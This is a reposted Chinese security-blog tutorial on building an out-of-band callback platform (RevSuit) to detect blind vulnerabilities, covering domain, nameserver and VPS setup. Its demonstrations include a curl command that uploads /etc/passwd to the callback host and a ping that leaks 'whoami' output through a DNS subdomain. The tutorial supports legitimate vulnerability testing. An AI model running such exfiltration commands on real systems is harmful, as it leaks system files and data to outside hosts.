搭建反连平台检测oob漏洞

admin 2022年7月27日18:23:23评论100 views字数 689阅读2分17秒阅读模式

文章源自【字节脉搏社区】-字节脉搏实验室

作者-K.Fire

注册域名nameserver.com 和payload.com
购买带有公网IP的VPS  1.1.1.1


建立nameserver,nameserver.com添加解析记录

搭建反连平台检测oob漏洞


更改payload.com的nameservers指向

NS1.NAMESERVER.COM/NS2.NAMESERVER.COM

搭建反连平台检测oob漏洞


这样payload.com的域名解析请求将由nameserver.com完成,同时将nameserver.com指向你的反连平台1.1.1.1


搭建反连平台检测oob漏洞


搭建反连平台

https://github.com/Li4n0/revsuit/releases先运行一遍以便生成数据库和配置文件,修改config.yaml

搭建反连平台检测oob漏洞


在VPS 1.1.1.1 上运行服务端


搭建反连平台检测oob漏洞


访问 http://nameserver.com/revsuit/admin/

输入token 即可进入
搭建反连平台检测oob漏洞


演示http logs


新建http log 规则
搭建反连平台检测oob漏洞


在靶机8.8.8.8上输入 curl 

http://nameserver.com/testhttplog -F file=@/etc/passwd


效果展示:
搭建反连平台检测oob漏洞


演示dnslogs


新建dns log 规则
搭建反连平台检测oob漏洞


在靶机8.8.8.8上输入 

ping `whoami`.payload.com

效果展示:
搭建反连平台检测oob漏洞
其他不一一展示



 // 

搭建反连平台检测oob漏洞

公众号招募文章投稿小伙伴啦!只要你有技术有想法要分享给更多的朋友,就可以参与到我们的投稿计划当中哦~感兴趣的朋友公众号首页菜单栏点击【商务合作-我要投稿】即可。期待大家的参与~



字节脉搏实验室

搭建反连平台检测oob漏洞



原文始发于微信公众号(字节脉搏实验室):搭建反连平台检测oob漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月27日18:23:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   搭建反连平台检测oob漏洞https://cn-sec.com/archives/1204598.html

发表评论

匿名网友 填写信息